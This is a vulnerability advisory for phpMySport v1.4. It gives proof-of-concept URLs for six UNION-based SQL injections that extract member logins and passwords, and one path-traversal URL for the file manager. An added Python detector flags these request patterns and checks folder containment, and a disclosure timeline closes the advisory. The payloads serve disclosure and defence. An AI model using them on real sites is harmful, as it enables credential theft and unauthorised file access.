#######################################################################
Multiple Vulnerabilities in phpMySport v1.4
Name: Multiple Vulnerabilities in phpMySport
Systems Affected: phpMySport v1.4
Site: http://phpmysport.sourceforge.net/en/
Author: Amol Naik (amolnaik4[at]gmail.com)
Date: 18/01/2010
#######################################################################
############
OVERVIEW
############
phpMySport v1.4 is vulnerable to the following issues:
1. Multiple SQL Injection
2. Unprotected Access to File Manager
####################
Technical Details
####################
1. Multiple SQL Injection:
Multiple SQL injection instances exist in phpMySport v1.4 when "magic_quotes_gpc = OFF" (so the single quote in the PoC values reaches the query unescaped).
PoC:
+++++
http://localhost/phpmysport/index.php?r=member&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,concat(member_login,0x3a,member_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+pms_member--+-
http://localhost/phpmysport/index.php?r=news&v1='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,concat(member_login,0x3a,member_pass),8,9,10,11,12,13,14,15,16,17+from+pms_member--+-
http://localhost/phpmysport/index.php?r=information&v1='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,concat(member_login,0x3a,member_pass),9,10,11,12,13,14,15,16,17,18,19+from+pms_member--+-
http://localhost/phpmysport/index.php?r=team&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,concat(member_login,0x3a,member_pass),6,7,8+from+pms_member--+-
http://localhost/phpmysport/index.php?r=club&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,concat(member_login,0x3a,member_pass),5,6,7,8,9,10,11,12,13,14+from+pms_member--+-
http://localhost/phpmysport/index.php?r=matches&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(member_login,0x3a,member_pass),20,21,22,23,24,25,26,27,28+from+pms_member--+-
2. Unprotected Access to File Manager:
Access to the file manager is unprotected, and by using dot-dot-slash sequences (/../../) it is possible to view the directory structure of the target system.
PoC:
+++++
http://localhost/phpmysport/index.php?r=file&v1=file_manager&current_folder=/../../../&fen=pop
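Defender-side check for both issues above, as an added example that is not part of the advisory or of phpMySport: it flags request URLs carrying the quote-terminated UNION pattern in v1/v2 or a dot-dot segment in current_folder, and shows the base-directory containment test the file manager lacks. The endpoint and parameter names come from the PoC URLs; the regex, the base path and the finding labels are assumptions.

```python
"""Detection and containment checks for the phpMySport v1.4 issues.
Added example (not project code). Patterns and base path are assumptions."""
import posixpath
import re
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

# A quote-terminated value that goes on to UNION ... SELECT, as in the PoCs.
SQLI_RE = re.compile(r"""['"]\s*(?:and|or)\b.*\bunion\b.*\bselect\b""",
                     re.IGNORECASE | re.DOTALL)


def analyze_request(url: str) -> List[str]:
    """Return findings for one request URL (e.g. from an access log)."""
    parts = urlsplit(url)
    if not parts.path.endswith("index.php"):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)  # '+' -> ' '
    module = params.get("r", [""])[0]
    findings = []
    for name in ("v1", "v2"):  # the injected parameters in the PoCs
        for value in params.get(name, []):
            if SQLI_RE.search(value):
                findings.append(f"sqli:{module}:{name}")
    if module == "file":
        for value in params.get("current_folder", []):
            if ".." in value.split("/"):  # any parent-directory segment
                findings.append("traversal:file:current_folder")
    return findings


def safe_folder(base: str, requested: str) -> Optional[str]:
    """Resolve a requested folder below base; None if it would escape base.

    Purely lexical (no filesystem access), so it is safe to call on input
    before touching the disk. base is assumed to be an absolute POSIX path.
    """
    base = base.rstrip("/") or "/"
    joined = posixpath.normpath(posixpath.join(base, requested.lstrip("/")))
    if joined != base and not joined.startswith(base + "/"):
        return None  # traversal such as /../../../ lands outside base
    return joined
```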
#############
Timeline
#############
Bug Discovered: 01/01/2010
Informed Vendor: 09/01/2010 -- no response received
Public Disclosure: 18/01/2010